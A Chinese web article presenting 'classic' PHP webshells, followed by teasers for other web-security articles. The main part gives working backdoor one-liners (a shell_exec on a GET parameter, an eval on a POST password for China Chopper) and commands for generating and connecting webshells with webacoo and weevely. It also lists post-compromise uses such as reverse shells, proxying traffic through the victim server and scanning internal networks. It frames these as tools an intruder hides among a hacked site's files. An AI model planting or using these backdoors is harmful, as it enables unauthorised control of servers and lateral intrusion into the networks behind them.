几种好用的经典webshell(php)

时间: 2019-02-03阅读: 285标签: 安全

webshell就是以网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 

顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。


php经典一句话: 

<?php echo shell_exec($_GET[‘cmd‘]);?>


中国菜刀:
官网:www.maicaidao.co
原理:上传一句话(<?php @eval($_POST[‘我是密码‘]);?>)至服务器端,再用中国菜刀客户端(图形化界面)去连接服务器

 

webacoo(kali):
特点:传输的数据包裹在cookie中,并非http包体内,起到一定绕过作用
原理:生成webshell,上传至目标服务器,再拿webacoo去连接该webshell,返回可以执行系统命令的shell
缺点:不可设置专属连接密码
生成webshell: webacoo -g -o a.php
连接webshell: webacoo -t -u http://192.168.1.1/a.php

 

weevely(kali):
原理:生成webshell,上传至目标服务器,再拿weevely去连接该webshell,返回可以执行系统命令的shell
生成webshell:weevely generate 密码 a.php
连接webshell:weevely http://192.168.1.1/a.php 密码
特点:连接到目标服务器webshell后还可以调用内置的N多模块,在shell下输入help查看模块,直接在shell下输入模块名称使用模块

30多个管理模块举例:
1、执行系统命令、浏览文件系统
2、检查服务器常见配置错误
3、创建正向、反向TCP Shell连接
4、将目标服务器作为代理http服务器(肉鸡) ====>只需要在连接到的shell中输入net_proxy即可打开代理,此时会在本地监听127.0.0.1:8080,浏览器设置为该代理后所有流量将走目标服务器
5、从目标计算机运行端口扫描,渗透内网


网络安全的新方向_边缘计算

分布式、无所不在的计算基础设施可能以更大的攻击面为代价。通过采用边缘计算,公司将一些处理转移到外围,更靠近需要工作的地方,以提高性能、减少网络流量和减少延迟。这带来了一系列网络安全挑战,常规数据中心运营商可能无法应对。

叮咚生活官网,叮咚生活软件安全吗?

刷信用卡时爽的不行,还信用卡时头疼的要命,这恐怕是很多刷卡族的共性,也是不少普通收入的人面对信用卡账单时的一些痛点。那么,有没有更好的方法,既能让我们刷卡爽,还能让我们不为还款头疼呢?

JavaScript防流量劫持【前端安全】

在网页开发的访问过程中,http是我们主要的访问协议。我们知道http是一种无状态的连接。即没有验证通讯双方的身份,也没有验证信息的完整性,所以很容易受到篡改

9项你不得不知道的Kubernetes安全最佳实践

由于Kubernetes控制台中的配置错误,特斯拉被一个恶意挖掘加密货币的软件所感染。***者利用了特定Kubernetes控制台没有密码保护的这一漏洞,访问其中一个包含特斯拉大型AWS环境访问凭据的pod。

第三方CSS安全吗?

第三方内容在其沙箱中具有很高的影响力。 虽然图像或沙盒iframe有着非常小的沙箱,但脚本和样式的作用范围却影响你的整个页面,甚至是整个站点。如果你担心用户会欺骗你的网站去加载第三方资源,可以使用CSP(内容安全策略)保证安全

一些安全相关的HTTP header

HTTP Strict-Transport-Security,简称为HSTS。X-Frame-Options:是否允许一个页面可在<frame>、<iframe>、<object>中展现的标记。X-XSS-Protection作用:防范XSS攻击。

Web安全测试检查单

Web安全测试检查单。上传功能:绕过文件上传检查功能,上传文件大小和次数限制。注册功能:注册请求是否安全传输,注册时密码复杂度是否后台检验,激活链接测试

谈 target=‘_blank’的安全问题

大家都喜欢target=_blank, 因为新页面打开不影响原来的页面。但是这个存在安全问题, 由target=_blank打开的页面, 可以通过window.opener访问原来的窗口。遍可以简单的将网页导航到其他网站, 这就存在很多的安全隐患了, 比如钓鱼,这种问题解决起来也很简单, 在链接中加入rel=noreferrer noopener属性就可以了

30 分钟理解 CORB 是什么

我当前的 chrome 版本是 v68,如果是 v66 或更低版本可能提示的警告信息略有不同。印象中只对 CORS 比较熟悉,CORB 是个什么鬼?好奇心迫使我想要了解一下它到底是什么,于是暂时把手头工作放下查了一些资料并花时间汇总了一下,就有了这篇文章

利用CSS注入(无iFrames)窃取CSRF令牌

要做到无iFrame,我将使用一种类似于之前我讨论过的方法:我将创建一个弹窗,然后在设置计时器后更改弹出窗口的位置。使用这种方法,我仍然可以加载受害者的CSS,但我不再依赖于受害者是否允许iFrame。

内容以共享、参考为目的,请勿用于商业用途。其版权归原作者所有,如有侵权,请与小编联系,情况属实将予以删除!

广告赞助文章投稿关于web前端网站点搜索站长推荐网站地图站长QQ:522607023

小程序专栏: 土味情话心理测试脑筋急转弯幽默笑话段子句子语录成语大全